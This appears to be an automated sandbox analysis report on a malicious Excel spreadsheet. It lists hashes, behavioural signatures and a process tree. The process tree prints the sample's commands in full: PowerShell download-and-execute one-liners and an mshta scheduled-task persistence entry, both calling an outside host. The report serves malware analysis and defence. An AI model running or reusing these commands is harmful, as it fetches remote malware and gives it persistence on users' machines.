Analysis
-
max time kernel
102s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-08-2022 07:45
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Resource
win10v2004-20220812-en
General
-
Target
SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
-
Size
33KB
-
MD5
78a8eef1db5dba3faff2bead626f205a
-
SHA1
dea2b77ef05fa0374377f71fb46a226a47124b2c
-
SHA256
3598a4f8d24a8fbf222fff1b413c7b8409a0f7e099a37c0b1476c6928e76e688
-
SHA512
aef9e5d9502278c19b82b5f3e57bb57833d7d54c2d1631935df4c509ce2753fb2646a2b82c4eccd9a3d198026011dee3a759ce350fa98facf58142ac0cfafd68
Malware Config
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4836 3220 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4884 3220 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5056 3220 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4780 3220 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 39 4388 powershell.exe 53 3020 powershell.exe -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{CC5A5A47-3725-4138-900D-1FB5C5AFBB6E}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{A471C7D9-5625-4540-9362-E89158221A16}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B9BAD1D1-48AE-4F32-9F6B-321036BBEA1C}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DD2CE6FB-931A-431E-A78F-E2E4A4604349}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{04C833F0-E5E8-4130-97DE-C90F47890597}.catalogItem svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FFD60803-3B8A-4A0E-87C5-75D4A04286AD}.catalogItem svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exeEXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
EXCEL.EXEsvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 816 taskkill.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4496 PING.EXE 1708 PING.EXE 404 PING.EXE 960 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3220 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4388 powershell.exe 4388 powershell.exe 3020 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
taskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 816 taskkill.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE 3220 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3220 wrote to memory of 4836 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 4836 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 4884 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 4884 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 5056 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 5056 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 4780 3220 EXCEL.EXE cmd.exe PID 3220 wrote to memory of 4780 3220 EXCEL.EXE cmd.exe PID 4836 wrote to memory of 1708 4836 cmd.exe PING.EXE PID 4836 wrote to memory of 1708 4836 cmd.exe PING.EXE PID 5056 wrote to memory of 4496 5056 cmd.exe PING.EXE PID 5056 wrote to memory of 4496 5056 cmd.exe PING.EXE PID 4780 wrote to memory of 404 4780 cmd.exe PING.EXE PID 4780 wrote to memory of 404 4780 cmd.exe PING.EXE PID 4884 wrote to memory of 960 4884 cmd.exe PING.EXE PID 4884 wrote to memory of 960 4884 cmd.exe PING.EXE PID 5056 wrote to memory of 1620 5056 cmd.exe cmd.exe PID 5056 wrote to memory of 1620 5056 cmd.exe cmd.exe PID 1620 wrote to memory of 4388 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 4388 1620 cmd.exe powershell.exe PID 5056 wrote to memory of 1888 5056 cmd.exe cmd.exe PID 5056 wrote to memory of 1888 5056 cmd.exe cmd.exe PID 1888 wrote to memory of 816 1888 cmd.exe taskkill.exe PID 1888 wrote to memory of 816 1888 cmd.exe taskkill.exe PID 4836 wrote to memory of 1668 4836 cmd.exe cmd.exe PID 4836 wrote to memory of 1668 4836 cmd.exe cmd.exe PID 1668 wrote to memory of 3020 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 3020 1668 cmd.exe powershell.exe PID 4884 wrote to memory of 4688 4884 cmd.exe cmd.exe PID 4884 wrote to memory of 4688 4884 cmd.exe cmd.exe PID 4688 wrote to memory of 4668 4688 cmd.exe schtasks.exe PID 4688 wrote to memory of 4668 4688 cmd.exe schtasks.exe
Processes
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 80 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 85 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 10 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c start /min taskkill /f /im WINWORD.EXE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im WINWORD.EXE4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 7 127.0.0.13⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54267fc1e87ee23aeb8b9a7d0497091c5
SHA159ddae7dc44b8317ff933ad113493eb1644c52c0
SHA256ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d
SHA5121d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD5aa51e5e20be1448c0591e05d784b59bf
SHA15224a48f5cd72577e4b09f2710573f0997f14632
SHA256d8488d28a56e4daaf7f85162b16dd31f10e8f95567d99c494eb3e5340075d2d3
SHA512431585e8f69e0efa4252e9d1da1dc7841f10ecd0facd175aa5de42712bbfc4d8c46c0083814e32d1ce1cfecdb8cf679befeb6346621c95786caa681fe354316c
-
C:\Users\Public\DefenderFile.batFilesize
1KB
MD5ae4a0997ce01f4ebbb3f3cc0054ce933
SHA1e5bfe3b390f1208b8b6ea0317f4364005f552851
SHA256a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce
SHA5125de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184
-
C:\Users\Public\Outlook.batFilesize
900B
MD50427a3545c2eaed3167cffe2cf5f8aba
SHA1b27f3a7d2b855f1d0b84727603add711bb6f6170
SHA256ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391
SHA512fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b
-
C:\Users\Public\task.batFilesize
954B
MD520a395a26f50352dc994664c3e7df533
SHA19b6407d22297b7af7c49aacd51bf42e51ced7029
SHA256c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32
SHA5122b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617
-
memory/404-145-0x0000000000000000-mapping.dmp
-
memory/816-151-0x0000000000000000-mapping.dmp
-
memory/960-146-0x0000000000000000-mapping.dmp
-
memory/1620-148-0x0000000000000000-mapping.dmp
-
memory/1668-156-0x0000000000000000-mapping.dmp
-
memory/1708-143-0x0000000000000000-mapping.dmp
-
memory/1888-150-0x0000000000000000-mapping.dmp
-
memory/3020-157-0x0000000000000000-mapping.dmp
-
memory/3020-162-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmpFilesize
10.8MB
-
memory/3020-161-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmpFilesize
10.8MB
-
memory/3220-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-170-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-169-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-168-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-167-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmpFilesize
64KB
-
memory/3220-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmpFilesize
64KB
-
memory/3220-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/3220-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4388-154-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmpFilesize
10.8MB
-
memory/4388-149-0x0000000000000000-mapping.dmp
-
memory/4388-153-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmpFilesize
10.8MB
-
memory/4388-152-0x0000021CF4870000-0x0000021CF4892000-memory.dmpFilesize
136KB
-
memory/4496-144-0x0000000000000000-mapping.dmp
-
memory/4668-165-0x0000000000000000-mapping.dmp
-
memory/4688-164-0x0000000000000000-mapping.dmp
-
memory/4780-142-0x0000000000000000-mapping.dmp
-
memory/4836-139-0x0000000000000000-mapping.dmp
-
memory/4884-140-0x0000000000000000-mapping.dmp
-
memory/5056-141-0x0000000000000000-mapping.dmp